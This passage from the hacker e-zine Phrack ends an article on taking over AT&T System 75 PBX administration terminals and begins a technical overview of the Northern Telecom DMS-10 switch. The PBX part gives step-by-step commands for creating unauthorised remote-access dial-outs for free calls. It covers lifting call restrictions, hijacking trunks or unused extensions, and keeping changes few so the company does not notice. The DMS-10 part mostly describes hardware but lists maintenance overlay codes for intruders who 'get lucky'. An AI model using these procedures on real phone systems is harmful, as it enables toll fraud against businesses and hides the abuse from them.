  2829.  
  2830. When you log in, you will have the commands LIST, DISPLAY, and a couple others
  2831. that don't matter.  These are the only ones that you will need with the
  2832. aforementioned default.  First type "DIS REM" (display remote access).  If
  2833. there is a PBX set up on the system, it will be shown on the extension line.
  2834. The barrier code is the code to the PBX. If "none" appears, there is no code
  2835. and it's just 9+1.  The extension line can either be 3 or 4 digits.  Usually,
  2836. if it's 3 digits, it is run off of AUDIX (AUDio Information eXchange) or they
  2837. are smart and are hiding the one digit!  Look at the dialplan and see if the
  2838. extensions are 3 or 4 digits.  If it tells you that the extensions are three
  2839. digits, chances are that it is somewhere in the AUDIX system.  If it's run off
  2840. of an AUDIX, look through all of the extensions by either list or display
  2841. 'extensions' until you find one that says something like "remote extension" or
  2842. something that looks different.  If the one digit is hidden, use ToneLoc and
  2843. scan for the digit needed.  Next, display the trunk groups.  This will tell you
  2844. the actual dial-up.  If you don't find it here, don't panic.  As you go through
  2845. the trunk groups, also look at the incoming destination as well as the night
  2846. destination.  If any of these show the remote extension here, there is your
  2847. PBX.  If not, keep looking through all of the trunk groups.  Write down all of
  2848. the phone numbers it gives you and try them.  They can usually be found on page
  2849. three or so.
  2850.  
  2851. A LOT of the time, places call forward a back line or so to the actual PBX.  If
  2852. there is no remote access extension when you display the remote access, you are
  2853. shit out of luck unless you have a higher default and read the rest of this
  2854. text.
  2855.  
  2856.  
  2857. Setting Up Your Own PBX
  2858. ~~~~~~~~~~~~~~~~~~~~~~~
  2859. If you have a higher default, you will notice that if you type help, you have
  2860. more commands that are available to you, such as change, download, etc.
  2861. Remember, the company can change the privileges of the defaults so if you
  2862. cannot see these commands, use another default.  The first thing you want to do
  2863. is to display the dialplan.  This will tell you the amount of digits and the
  2864. first digit of all of the sequences.  Here is an example of a dialplan.  There
  2865. are several ways the dialplan may look.
  2866.  
  2867.                  Number of Digits
  2868. -------1----2----3----4----5----6----7----8----9
  2869. --
  2870. F 1
  2871. I 2        Tac
  2872. R 3
  2873. S 4             Fac
  2874. T 5
  2875.   6               Extension
  2876. D 7               Extension
  2877. I 8        Tac
  2878. G 9
  2879. I 0 Attendant
  2880. T *
  2881.   #
  2882.  
  2883. Using the above chart, all extensions will start with either a 6 or 7 and will
  2884. be four digits long.  The Tac is two digits, and will start with a 2 or an 8.
  2885. Don't worry about FAC or any others at this time.
  2886.  
  2887. After you make note of this, type "ch rem" (change remote access), go to the
  2888. extension line, and put in an extension.  Next, find the trunk group that you
  2889. want to use and type "ch tru #".  Go to the line for night service and put the
  2890. extension in there.  If there is already an extension for night service on all
  2891. of the trunks, don't worry. If not, add it, and then save it.  If it says
  2892. invalid extension, you misread the dialplan.  If you pick an extension already
  2893. in use, it will tell you so when you try to install it in the remote extension
  2894. line in the remote address.  Once all of this is completed, you may go back to
  2895. the remote access and add a code if you like, or you may just enter "none" and
  2896. that will be accepted.  THE NEXT PART IS VERY IMPORTANT!  Look at the trunk
  2897. that you installed and write down the COR number.  Cancel that command and type
  2898. "dis cor #".  Make sure that the Facilities Restriction Level (FRL) at the top
  2899. is set to 7 (7 is the least restricted level & 0 is the most) and that under
  2900. calling party restrictions & called party restrictions, the word "none" (lower
  2901. case) is there!  If they are not, type "ch cor #" and make the changes.  Last,
  2902. type "dis feature".  This will display the feature access codes for the system.
  2903. There will be a line that says something like "SMDR Access Code."  This will be
  2904. the code that you enter after the barrier code if there is one.  I have seen
  2905. some be like *6, etc.  Also, there will be, on page 2 I believe, something to
  2906. the like of outside call. usually it is set to 9 but check to be sure.   That's
  2907. about it for this segment.  All should be fine at this point.  For those that
  2908. want a 24 hour PBX, this next section is for you.
  2909.  
  2910.  
  2911. For those of you that are greedy, and want a 24 hour PBX, most of the steps
  2912. above are the same.  The only difference is that you will look through all of
  2913. the trunks until you come across one that has several incoming rotary lines in
  2914. it.  Simply write down the port number and the phone number for future
  2915. reference and delete it by using the "ch" command.  From the main prompt, type
  2916. "add tru #".  For the TAC, enter a correct TAC number.  Keep going until you
  2917. get to the COR.  Enter a valid one and remember that the FRL should be set to
  2918. 7, etc.  Keep going...the next line that is vacant and needs something is the
  2919. incoming destination.  Set it to the remote extension that you have created.
  2920. The next vacant line I think is type (towards the middle of the page).  Enter
  2921. ground and it should print out "ground-start."  If there is a mistake, it will
  2922. not save and it will send you to the line that needs to have something on it.
  2923. After all is done, it will save.  After this segment, there is a copy of a
  2924. trunk and what it should look like for the use of a PBX.  Next, go to page 3
  2925. and enter the port and phone number that you wrote down earlier.  Save all of
  2926. the changes that you have made.  This should be all you need.
  2927.  
  2928.  
  2929. One more way!  If you scan through all of the extensions on the system, you may
  2930. find an "open" extension.  This extension may be like the phone outside in the
  2931. waiting room or an empty office or whatever.  This extension must be a valid
  2932. phone number on their network or must be reachable on their AUDIX for this
  2933. method to work. If you know how to add ports to Audix, this method will be best
  2934. for you since setting up a trunk is not needed.  If you find something like
  2935. this, it's usually better to use this as your 24 hour PBX rather than taking
  2936. away a line for several reasons:  1) there are less changes that you must make
  2937. so there will be less data saved in the history file; 2) other people that have
  2938. legal uses for the line won't trip out when they get a dial tone; and 3) the
  2939. company will not notice for some time that they've lost an extension that is
  2940. hardly used!  To set it up this way, you must delete the old info on that
  2941. extension by typing "remove extension #".  It will then show you the station in
  2942. detail.  Save it at that point and it will be deleted.  Next go to the remote
  2943. access and enter the extension that you deleted on the remote extension line.
  2944. Next enter a barrier code or "none" if you don't want one.  Save it!  Doing it
  2945. this way USUALLY does not require a new trunk to be added since the port is
  2946. already in the system but if you run into problems, go back and add it through
  2947. the use of a trunk.  You will still have to assign it a "cor" in the remote
  2948. access menu, and remember to make sure that the FRL and the restrictions are
  2949. set correctly as stated as above.
  2950.  
  2951.  
  2952. In part 2, if there is a demand, I will tell how to make a bridge off of a 75.
  2953. It is a lot more difficult, and requires a lot more reading of the manuals.  If
  2954. anyone can obtain the manuals, I would strongly urge them to do so.  Also
  2955. potentially in part 2, I will show how to create a VMB.  If they have AUDIX
  2956. voice mail, chances are they have a 75!
  2957.  
  2958. So happy hunting and see ya soon!
  2959.  
  2960. If you need to get a hold of me to ask a question, you may catch me on the nets
  2961. or on IRC.
  2962.  
  2963. Enjoy!
  2964.  
  2965. Scott Simpson
  2966.  
  2967. -------------------------------------------------------------------------------
  2968. APPENDIX A : Example of a Trunk For PBXs
  2969.  
  2970.                               Trunk Group                    Page 1 of 5
  2971.                               -----------
  2972.  
  2973. Group Number #               Group Type: co                Smdr Reports: n
  2974.  
  2975.    Group name: Whatever ya want         Cor: #            Tac: #
  2976.  
  2977. Mis Measured? n
  2978.  
  2979.    Dial access: y    Busy Threshold: 60      Night Service: What will answer
  2980.                                                             after hours
  2981.  
  2982. Queue length: 0  Abandoned call Search: n   Incoming Dest: What will answer
  2983.                                                            any time the # is
  2984.                                                            called unless NS
  2985.                                                            has an extension.
  2986.  
  2987.     Comm Type: voice       Auth Code: n     Digit Absorption List:
  2988.  
  2989.  
  2990.       Prefix-1? n    Restriction: code    Allowed Calls List: n
  2991.  
  2992.    Trunk-Type: Ground-start
  2993.  
  2994.  Outgoing Dial type: tone
  2995.  
  2996.   Trunk Termination: whatever it is        Disconnect Timing: Whatever it is
  2997.                      to.                                      set to.
  2998.                              ACA Assignments: n
  2999.  
  3000.  
  3001. [Page 2 is not all that important.  It's usually used for all of the
  3002. [maintenance to the trunk etc. so leave it all set to its default setting.]
  3003.  
  3004.  
  3005.                                                   page 3 of 5
  3006.        Port        Name        Mode      Type       Answer delay
  3007. 1   Port number  phone number
  3008. 2
  3009. 3
  3010. etc.
  3011.  
  3012.  
  3013. That's all that is needed for the trunks.
  3014. -------------------------------------------------------------------------------
  3015. APPENDIX B : Basic Commands and Terms
  3016.  
  3017.      Basic Terminology
  3018.      -----------------
  3019. COR  - Class Of Restriction
  3020. FRL  - Facilities Restriction Level
  3021. SMDR - Station Message Detail Recording
  3022. TAC  - Trunk Access Code
  3023. FAC  - Feature Access Code
  3024.  
  3025.  
  3026.      Basic Commands for Default Emulation (513)
  3027.      ------------------------------------------
  3028. Esc Ow - Cancel
  3029. Esc [U - Next Page
  3030. Esc SB - Save
  3031. Esc Om - Help
  3032.  
  3033.  
  3034.      Commands for 4410
  3035.      -----------------
  3036. Esc Op - Cancel
  3037. Esc Ot - Help
  3038. Esc Ov - Next Page
  3039. Esc Ow - Back Page
  3040. Esc OR - Save
  3041. Esc Oq - Refresh
  3042. Esc Os - Clear Fields
  3043.  
  3044. Below is an explanation of all of the commands.
  3045.  
  3046. The following is a captured buffer of a login to System 75.  I have captured
  3047. the commands and have edited the buffer to include brief definitions of the
  3048. commands.
  3049.  
  3050. Display and list are basically the same command, but display shows more
  3051. detailed information on the command that you select.  For example, "list tru"
  3052. will list all of the trunk groups in the system.  "dis tru" will ask for a
  3053. trunk number, and then display all of the information on that trunk.
  3054.  
  3055. CH Help
  3056. Please enter one of the following action command words:
  3057.  
  3058. add                      duplicate                save
  3059. change                   list                     set
  3060. clear                    monitor                  status
  3061. display                  remove
  3062.  
  3063.  
  3064. Or enter 'logoff' to logoff the system
  3065. Add       - Is pretty self-explanatory
  3066. Change    - Is also self-explanatory
  3067. Clear     - will clear out the segment
  3068. Duplicate - will duplicate the process
  3069. List      - self-explanatory
  3070. Monitor   - used for testing, and monitoring the system
  3071. Remove    - remove anything from the system EXCEPT the History File!  Sorry
  3072.             guys!
  3073. Save      - saves work done
  3074. Set       - sets the time, etc.
  3075. Status    - shows current status of the system
  3076.  
  3077. List Help
  3078. Please enter one of the following object command words:
  3079.                       COMMANDS UNDER "LIST"
  3080. abbreviated-dialing      groups-of-extension      personal-CO-line
  3081. aca-parameters           hunt-group               pickup-group
  3082. bridged-extensions       intercom-group           station
  3083. configuration            measurements             term-ext-group
  3084. coverage                 modem-pool               trunk-group
  3085. data-module              performance
  3086.  
  3087. Or press CANCEL to cancel the command
  3088. Abbreviated-Dialing: Speed calling feature from their voice terminal
  3089. Aca-parameters: Automatic-Circuit-Assurance
  3090. Bridged Extensions: Used for bridging extensions together
  3091. Configuration: Overall system Configuration
  3092. Coverage: Call Coverage
  3093. Data-module: Description of the data module used
  3094. Groups Of Extensions: Lists all of the extensions available
  3095. Hunt-Group: Checks for active or idle status of extension numbers
  3096. Intercom-group: Lists the intercoms and their info
  3097. Modem-Pool: Allows switched connects between data modules and analog data
  3098. Performance: Shows the performance of the system
  3099. Personal-CO-line: Is for dedicated trunks to or from public terminals
  3100. Pickup-group: Pickup station setup
  3101. Station: Will list all of the available stations assigned
  3102. Term-ext-group: For terminating extension group
  3103. Trunk-Group: Lists ALL of the trunks; will NOT show all details like Display
  3104.  
  3105. Dis Help
  3106. Please enter one of the following object command words:
  3107.                     Commands Under 'Display'
  3108. abbreviated-dialing      data-module              personal-CO-line
  3109. alarms                   dialplan                 pickup-group
  3110. allowed-calls            digit-absorption         port
  3111. announcements            ds1                      psc
  3112. attendant                errors                   remote-access
  3113. button-location-aca      feature-access-codes     route-pattern
  3114. circuit-packs            hunt-group               station
  3115. code-restriction         intercom-group           synchronization
  3116. communication-interface  ixc-codes                system-parameters
  3117. console-parameters       listed-directory-numbers term-ext-group
  3118. cor                      modem-pool               time
  3119. cos                      paging                   trunk-group
  3120. coverage                 permissions
  3121.  
  3122.  
  3123. Or press CANCEL to cancel the command
  3124. Abbreviated Dialing: Covered above, but shows more information
  3125. Alarms: Will show information on the alarms (which ones are on/off)
  3126. Allowed-Calls: Will show LD carrier codes and allowed call list
  3127. Announcements:
  3128. Attendant: Allows attendant to access trunks without voice terminals
  3129. Button-location-aca: Will show the location of the aca selected
  3130. circuit-packs: Tells types of lines used.
  3131. Code-Restriction: Shows restrictions for HNPA and FNPA
  3132. Communication-Interface: Information on the communication interface
  3133. Console-Parameters: Will list the parameters of the console, etc.
  3134. Cor: Class Of Restriction (will show the cor for the # entered)
  3135. Cos: Class Of Service
  3136. Coverage: Shows the coverage of the system (voice terminals, etc.)
  3137. Data-Module: Will show information for the data channels entered
  3138. Dialplan: List the current config for extensions etc.
  3139. Digit-absorption:
  3140. Ds1: Used for tie-trunk services
  3141. Errors: Shows all of the errors on the system
  3142. Feature-Access_Codes: Lists all of the feature access codes for all of the
  3143.                       features on the entire system
  3144. Hunt-Group: As above, but will tell more information for the # you enter
  3145. Intercom Group: Lists all of the names and their intercom assignments
  3146. IXC-Codes: Inter-eXchange Carrier codes
  3147. Listed-Directory: Lists the numbers in the directory of the system
  3148. Modem-Pool: Will show info on the channel you select (exp baud, parity, etc.)
  3149. Paging: Used for the paging stations on the voice terminals
  3150. Permissions: Will show the privileges of the other accounts/defaults
  3151. Personal-CO-Line: As above but more descriptive
  3152. Pickup-Group: Shows names and extensions in the specified group number
  3153. Port: Will show the info on the port you ask about
  3154. PSC: Keeps a call between to data points connected while the system is active
  3155. Remote-Access: Will show the Remote Access that is there (if any)
  3156. Route-Pattern: The pattern of routing within the voice terminals, etc.
  3157. Station: Will show detailed information on the station # you enter
  3158. Synchronization: Will show the location of the DS1 packs
  3159. System-Parameters: List of all of the available systems parameters
  3160. Term-Ext-Group: As above but more descriptive
  3161. Time: Will show the current time and date
  3162. Trunk-Group: Will show all available information for the trunk you select
  3163. _______________________________________________________________________________
  3164.  
  3165.                                 ==Phrack Inc.==
  3166.  
  3167.                    Volume Four, Issue Forty-One, File 7 of 13
  3168.  
  3169.                           How To Build A DMS-10 Switch
  3170.  
  3171.                                 by The Cavalier
  3172.                      Society for the Freedom of Information
  3173.  
  3174.                                  March 11, 1992
  3175.  
  3176.  
  3177.      With the telephone network's complexity growing exponentially as the
  3178. decades roll by, it is more important than ever for the telecom enthusiast to
  3179. understand the capabilities and function of a typical Central Office (CO)
  3180. switch.  This text file (condensed from several hundred pages of Northern
  3181. Telecom documentation) describes the features and workings of the Digital
  3182. Multiplex Switch (DMS)-10 digital network switch, and with more than an average
  3183. amount of imagination, you could possibly build your own.
  3184.  
  3185.      The DMS-10 switch is the "little brother" of the DMS-100 switch, and the
  3186. main difference between the two is the line capacity.  The DMS line is in
  3187. direct competition to AT&T's ESS line (for the experienced folks, the features
  3188. covered are the as those included in the NT Software Generic Release 405.20 for
  3189. the 400 Series DMS-10 switch).
  3190.  
  3191.  
  3192.  Table of Contents
  3193.  ~~~~~~~~~~~~~~~~~
  3194. I.   OVERVIEW/CPU HARDWARE SPECS
  3195. II.  NETWORK SPECS
  3196.      1. Network Hardware
  3197.      2. Network Software
  3198.      3. Advanced Network Services
  3199. III. EXTERNAL EQUIPMENT SPECS
  3200.      1. Billing Hardware
  3201.      2. Recorded Announcement Units
  3202.      3. Other Misc. Hardware
  3203. IV.  MAINTENANCE AND ADMINISTRATION
  3204.      1. OAM
  3205.      2. Interactive Overlay Software Guide
  3206. V.   SPEC SHEET
  3207. VI.  LIMITED GLOSSARY
  3208.  
  3209. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3210.  
  3211. I. OVERVIEW/CPU HARDWARE SPECS
  3212.  
  3213. Overview
  3214.  
  3215.      The DMS-10 switch is capable of handling up to 10,800 lines, and was
  3216. designed for suburban business centers, office parks, and rural areas.  It can
  3217. be installed into a cluster configuration to centralize maintenance and
  3218. administration procedures and to increase combined line capacity to 50,000
  3219. lines.  It is capable of functioning as an End Office (EO), an Equal Access End
  3220. Office (EAEO), and an Access Tandem (AT), and is a known as a Class 5 switch.
  3221. It supports up to 3,408 trunks and 16,000 directory numbers.  It can outpulse
  3222. in DP (Dial Pulse), MF (Multi-Frequency), or DTMF (Dual-Tone Multi-Frequency),
  3223. insuring compatibility with new and old switches alike (translation -- the
  3224. switch is small, by most standards, but it has massive bounce for the ounce).
  3225.  
  3226.  
  3227. Hardware Specifications
  3228.  
  3229.      The DMS-10 switch itself is a 680x0-based computer with 1 MB of RAM in its
  3230. default configuration.  The processor and memory are both duplicated; the
  3231. backup processor remains in warm standby.  The memory system is known as the
  3232. n+1 system, meaning that the memory is totally duplicated.
  3233.  
  3234.  
  3235. II. NETWORK SPECS
  3236.  
  3237. Network Hardware
  3238.  
  3239.      The DMS-10 network hardware consists mostly of PEs, or Peripheral
  3240. Equipment trunk and line packs.  The PEs take the incoming analog voice
  3241. signals, digitalize them into 8 bit PCM (Pulse Code Modulation) signals, and
  3242. feed it into the main transmission matrix section of the switch.  There, it is
  3243. routed to another trunk or line and converted back into an analog signal for
  3244. retransmission over the other side of the call.  Note that manipulating voice
  3245. in the digital domain allows the signal to be rerouted, monitored, or
  3246. retransmitted across the country without any reduction in signal quality as
  3247. long as the signals remain in PCM format.  <Hint!>
  3248.  
  3249.  
  3250. Network Software
  3251.  
  3252.      The DMS-10 has a variety of software available to meet many customers'
  3253. switching needs.  A good example of this software is the ability of several
  3254. DMS-10 switches to be set up in a cluster (or star configuration, for those of
  3255. you familiar with network topologies).  In this arrangement, one DMS-10 is set
  3256. up as the HSO (Host Switching Office) and up to 16 DMS-10s are set up as SSOs
  3257. (Satellite Switching Offices), allowing all billing, maintenance, and
  3258. administration to be handled from the HSO.  Additionally, all satellites can
  3259. function on their own if disconnected from the HSO.
  3260.  
  3261.      Another feature of the DMS-10's network software are nailed-up
  3262. connections, commonly known as loops.  The DMS-10 supports up to 48 loops
  3263. between any two points.  The connections are constantly monitored by the switch
  3264. computer, and if any are interrupted, they are re-established.
  3265.  
  3266.      Meridian Digital Centrex (MDC) is the name given to a group of features
  3267. that enable businesses to enjoy the benefits of having PBX (Private Branch
  3268. Exchange) equipment by simply making a phone call to the local telco.
  3269.  
  3270.  
  3271. Advanced Network Services (ANS)
  3272.  
  3273.      If the DMS-10 is upgraded with the 400E 32-bit RISC processor, the switch
  3274. will be able to handle 12,000 lines, enjoy a speed improvement of 80%, support
  3275. a six-fold increase in memory capacity, and, perhaps most importantly, will be
  3276. able to run NT's Advanced Network Services software.  This software includes
  3277. Common Channel Signaling 7 (CCS7), Advanced Meridian Digital Centrex, DMS
  3278. SuperNode connectivity, and ISDN.  CCS7 is the interswitch signaling protocol
  3279. for Signaling System 7, and the concept deserves another text file entirely
  3280. (see the New Fone eXpress/NFX articles on SS7).
  3281.  
  3282.  
  3283. III. EXTERNAL EQUIPMENT SPECS
  3284.  
  3285. Billing Format Specifications
  3286.  
  3287.      The DMS-10 can record AMA (Automatic Message Accounting) billing data in
  3288. either Bellcore or Northern Telecom format, and it can save this data in one of
  3289. several ways:
  3290.  
  3291.      - by saving onto a 9-track 800 BPI (Bits-Per-Inch) density tape drive
  3292.        called an MTU (Magnetic Tape Unit)
  3293.  
  3294.      - by saving onto a IOI (Input/Output Interface) pack with a 64 MB SCSI
  3295.        (Small Computer System Interface) hard drive, and transferring to 1600
  3296.        BPI tape drives for periodic transport to the RAO (Regional Accounting
  3297.        Office)
  3298.  
  3299.      - by transmitting the data through dial-up or dedicated telephone lines
  3300.        with the Cook BMC (Billing Media Converter) II, a hard drive system that
  3301.        will transmit the billing records on request directly to the RAO.  The
  3302.        Cook BMC II supports six different types of transmission formats, listed
  3303.        below:
  3304.  
  3305.         * AMATS (BOC)                           [max speed: 9600 bps]
  3306.             Call records are stored using the Bellcore AMA format and polled
  3307.             using the BX.25 protocol.  Two polling ports are provided with one
  3308.             functioning as a backup.
  3309.  
  3310.         * BIP Compatible                        [max speed: 9600 bps (2400*4)]
  3311.             Call records are stored using the Bellcore AMA format and polled
  3312.             using the HDLC Lap B protocol.  Four polling ports are provided
  3313.             that can function simultaneously for a combined throughput of 9600
  3314.             bps. This specification is compatible with GTE's Billing
  3315.             Intermediate Processor.
  3316.  
  3317.         * Bellcore AMA w/ BiSync polling        [max speed: 9600 bps]
  3318.             Call records are stored using the Bellcore AMA format and polled
  3319.             using the IBM BiSync 3780 protocol.  One polling port is provided.
  3320.             This option is intended for operating companies who use independent
  3321.             data centers or public domain protocols for data processing.
  3322.  
  3323.         * Bellcore AMA w/ HDLC polling          [max speed: 9600 bps]
  3324.             Call records are stored using the Bellcore AMA format and polled
  3325.             using the HDLC (High-level Data Link Control) protocol.  One port
  3326.             is provided.
  3327.  
  3328.         * NT AMA w/ HDLC polling                [max speed: 9600 bps]
  3329.             Call records are stored using the Northern Telecom AMA format and
  3330.             polled using the HDLC protocol.
  3331.  
  3332.         * NT AMA w/ BiSync polling              [max speed: 4800 bps]
  3333.             Call records are stored using the Northern Telecom AMA format and
  3334.             polled using the BiSync protocol.
  3335.  
  3336.      - by interfacing with AT&T's AMATS (Automatic Message Accounting
  3337.        Teleprocessing System)
  3338.  
  3339.      - by interfacing with the Telesciences PDU-20
  3340.  
  3341.      All of the above storage-based systems are fully fault-tolerant, and the
  3342. polled systems can store already-polled data for re-polling.
  3343.  
  3344.  
  3345. Recorded Announcement Units
  3346.  
  3347.      The DMS-10 system may be interfaced to one or more recorded announcement
  3348. units through two-wire E&M trunks.  Some units supported include the Northern
  3349. Telecom integrated Digital Recorded Announcement Printed Circuit Pack (DRA
  3350. PCP), the Cook Digital Announcer or the Audichron IIS System 2E.
  3351.  
  3352.      The DRA PCP is integrated with the DMS-10 system, as opposed to the Cook
  3353. and Audichron units, which are external to the switch itself.  It provides
  3354. recorded announcements on a plug-in basis and offers the following features:
  3355.  
  3356.      - Four ports for subscriber access to announcements
  3357.      - Immediate connection when pack is idle
  3358.      - Ringback tone when busy until a port is free
  3359.      - Switch-selectable message lengths (up to 16 seconds)
  3360.      - Local and remote access available for message recording
  3361.      - Memory can be optionally battery-backed in case of power loss
  3362.      - No MDF (Main Distribution Frame) wiring required
  3363.  
  3364. Other External Hardware
  3365.  
  3366.      The DMS-10 can also support the Tellabs 292 Emergency Reporting System,
  3367. the NT Model 3703 Local Test Cabinet, and the NT FMT-150 fiber optic
  3368. transmission system.  More on this stuff later, perhaps.
  3369.  
  3370.  
  3371. IV. MAINTENANCE AND ADMINISTRATION
  3372.  
  3373. OAM
  3374. ---
  3375.      OAM, or Operations, Administration, and Maintenance functions, are
  3376. performed through an on-site maintenance terminal or through a remote
  3377. maintenance dial-in connection.  The DMS-10 communicates at speeds ranging from
  3378. 110 to 9600 baud through the RS-232C port (standard) in ASCII.  There can be up
  3379. to 16 connections or terminals for maintenance, and security classes may be
  3380. assigned to different terminals, so that the terminal can only access the
  3381. programs that are necessary for that person's job.  The terminals are also
  3382. password protected, and bad password attempts result in denied access, user
  3383. castration and the detonation of three megatons of on-site TNT.  <Just kidding>
  3384.  
  3385.      The software model for the DMS-10 consists of a core program which loads
  3386. overlays for separate management functions.  These overlays can be one of two
  3387. types:  either free-running, which are roughly analogous to daemons on Unix
  3388. environments, which are scheduled automatically; or interactive, which
  3389. communicate directly with the terminal user.
  3390.  
  3391.      The major free-running programs are the Control Equipment Diagnostic
  3392. (CED), the Network Equipment Diagnostic (NED), the Peripheral Equipment
  3393. Diagnostic (PED), and the Digital Equipment Diagnostic (DED).  The CED runs
  3394. once every 24 hours, and tests the equipment associated with the CPU buses and
  3395. the backup CPU.  The NED runs whenever it feels like it and scans for faults in
  3396. the network and proceeds to deal with them, usually by switching to backup
  3397. hardware and initiating alarm sequences.  The PED is scheduled when the switch
  3398. is installed to run whenever the telco wants it to, and it systematically tests
  3399. every single trunk and line connected to that central office (CO).  The DED
  3400. tests the incoming line equipment that converts analog voice to digital PCM.
  3401.  
  3402.      Now, for interactive programs (a.k.a. interactive overlays), I'm going to
  3403. list all of their codes, just in case one of you gets lucky out there.  To
  3404. switch to an overlay, type OVLY <overlay>.  To switch to a sub-overlay, type
  3405. CHG <sub-overlay>.  Keep in mind that NT has also installed help systems on
  3406. some of their software, accessible by pressing "?" at prompts.  Here we go:
  3407.  
  3408. Overlay     Explanation and Prompting Sequences
  3409. -------     -----------------------------------
  3410. ALRM        Alarms
  3411.  
  3412.             ALPT - Alarm scan points
  3413.             SDPT - Signal distribution points
  3414.  
  3415. AMA         Automatic Message Accounting
  3416.  
  3417.             AMA  - Automatic Message Accounting
  3418.             MRTI - Message-rate treatment index
  3419.             PULS - Message-rate pulsing table
  3420.             TARE - Tariff table
  3421.  
  3422. AREA        Area
  3423.  
  3424.             CO   - Central Office Code
  3425.             HNPA - Home Numbering Plan Area
  3426.             RC   - Rate Center
  3427.             RTP  - Rate Treatment Package
  3428.  
  3429. CLI         Calling Line Identification
  3430.  
  3431. CNFG        Configuration Record
  3432.  
  3433.             ALRM - Alarm System Parameters
  3434.             AMA  - Automatic Message Accounting parameters
  3435.             BUFF - System Buffers
  3436.             CCS  - Custom Calling Services
  3437.             CCS7 - Common Channel Signaling No. 7
  3438.             CDIG - Circle Digit Translation
  3439.             CE   - Common Equipment Data
  3440.             CLUS - Cluster data
  3441.             COTM - Central Office overload call timing
  3442.             CP   - Call processing parameters
  3443.             CROT - Centralized Automatic Reporting of Trunks
  3444.             CRTM - Central Office regular call processing timing
  3445.             CSUS - Centralized Automatic Message Accounting suspension
  3446.             DLC  - Data Link Controller assignment for clusters
  3447.             E800 - Enhanced 800 Service
  3448.             FEAT - Features
  3449.             GCON - Generic Conditions
  3450.             HMCL - Host message class assignment
  3451.             IOI  - Secondary input/output interface pack(s)
  3452.             IOSF - Input/Output Shelf Assignment
  3453.             LCDR - Local Call Detail Recording
  3454.             LIT  - Line Insulation Testing parameters
  3455.             LOGU - Logical Units Assignments
  3456.             MOVE - Move Remote Line Concentrating Module
  3457.             MTCE - Maintenance Parameters
  3458.             MTU  - Magnetic Tape Unit Parameters
  3459.             OPSM - Operational Measurements
  3460.             OVLY - Overlay scheduling
  3461.             PSWD - Password Access
  3462.             SITE - Site assignments
  3463.             SSO  - Satellite Switching Office Assignments
  3464.             SUB  - Sub Switch
  3465.             SYS  - System parameters
  3466.             TRB  - Periodic trouble status reporting
  3467.             VERS - Version
  3468.  
  3469. CPK         Circuit Pack
  3470.  
  3471.             ACT  - AC Testing Definition
  3472.             DCM  - Digital Carrier Module
  3473.             LPK  - Line Concentrating Equipment line packs
  3474.             PACK - Peripheral Equipment packs
  3475.             PMS  - Peripheral Maintenance System pack
  3476.             PSHF - Peripheral Equipment Shelf
  3477.             RMM  - Remote Maintenance Module
  3478.             RMPK - Remote shelf
  3479.             RSHF - Remote Concentration Line Shelf
  3480.             SBLN - Standby line
  3481.             SLC  - SLC-96
  3482.             SLPK - SLC-96 pack
  3483.  
  3484. DN          Directory Number
  3485.  
  3486.             ACDN - Access Directory Number
  3487.             CRST - Specific Carrier Restricted
  3488.             ICP  - Intercept
  3489.             RCFA - Remote Call Forwarding appearance
  3490.             ROTL - Remote Office Test Line
  3491.             STN  - Station Definition
  3492.  
  3493. EQA         Equal Access
  3494.  
  3495.             CARR - Carrier Data Items
  3496.             CC   - Country Codes
  3497.  
  3498. HUNT        Hunting
  3499.  
  3500.             DNH  - Directory Number Hunting
  3501.             EBS  - Enhanced Business Services hunting
  3502.             KEY  - Stop hunt or random make busy hunting
  3503.  
  3504. LAN         Local Area Network
  3505.  
  3506.             LAC  - LAN Application Controller
  3507.             LCI  - LAN CPU Interface
  3508.             LSHF - Message LAN Shelf
  3509.  
  3510. NET         Network
  3511.  
  3512.             D1PK - DS-1 interface pack (SCM-10S)
  3513.             1FAC - Interface packs
  3514.             LCM  - Line Concentrating Module
  3515.             LCMC - Line Concentrating Controller Module
  3516.             NWPK - Network Packs
  3517.             RCT  - Remote Concentrator Terminal
  3518.             REM  - Remote Equipment Module
  3519.             RSLC - Remote Subscriber Line Module Controller
  3520.             RSLE - Remote Subscriber Line Equipment
  3521.             RSLM - Remote Subscriber Line Module
  3522.             SCM  - Subscriber Carrier Module (DMS-1)
  3523.             SCS  - SCM-10S shelf (SLC-96)
  3524.             SRI  - Subscriber Remote Interface pack
  3525.  
  3526. NTWK        Network
  3527.  
  3528.             ACT  - AC Testing definition
  3529.             D1PK - DS-1 interface pack (SCM-10S)
  3530.             DCM  - Digital Carrier Module
  3531.             1FAC - Interface packs
  3532.             LCM  - Line Concentrating Module
  3533.             LPK  - Line Concentrating Equipment line packs
  3534.             NWPK - Network packs
  3535.             PACK - Peripheral Equipment packs
  3536.             PMS  - Peripheral Maintenance System packs
  3537.             PSHF - Peripheral Equipment Shelf
  3538.             RCT  - Remote Concentrator Terminal
  3539.             REM  - Remote Equipment Module
  3540.             RSHF - Remote Shelf
  3541.             SBLN - Standby line
  3542.             SCM  - Subscriber Carrier Module
  3543.             SCS  - SCM-10S Shelf (SLC-96)
  3544.             SLC  - SLC-96
  3545.             SLPK - SLC-96 Line Packs
  3546.             SRI  - Subscriber Remote Interface (RLCM)
  3547.  
  3548. ODQ         Office Data Query
  3549.  
  3550.             ACDN - Access Directory Number
  3551.             CG   - Carrier group
  3552.             CNTS - Counts
  3553.             DN   - Directory Number
  3554.             DTRK - Digital Trunks (line and trunk)
  3555.             LINE - Lines (line and trunk)
  3556.             PIN  - Personal Identification Number
  3557.             STOR - Memory Storage
  3558.             TG   - Trunk Group
  3559.             TRK  - Trunks (line and trunk)
  3560.  
  3561. QTRN        Query Translations
  3562.  
  3563.             ADDR - Address Translations
  3564.             EBSP - Enhanced Business Services prefix translations
  3565.             ESAP - Emergency Stand-Alone Prefix
  3566.             PRFX - Prefix translations
  3567.             SCRN - Screening translations
  3568.             TRVR - Translation verification
  3569.  
  3570. ROUT        Routes
  3571.  
  3572.             CONN - Nailed-up connections
  3573.             DEST - Destinations
  3574.             POS  - Centralized Automatic Message Accounting positions
  3575.             ROUT - Routes
  3576.             TR   - Toll regions
  3577.  
  3578. SNET        CCS7 Signaling Network
  3579.  
  3580.             SNLS - Signaling Link Set
  3581.             SNL  - Signaling Link
  3582.             SNRS - Signaling Network Route Set
  3583.  
  3584. TG          Trunk Groups
  3585.  
  3586.             INC  - Incoming trunk groups
  3587.             OUT  - Outgoing trunk groups
  3588.             2WAY - Two-way trunk groups
  3589.  
  3590. THGP        Thousands Groups
  3591.  
  3592. TRAC        Call Tracing
  3593.  
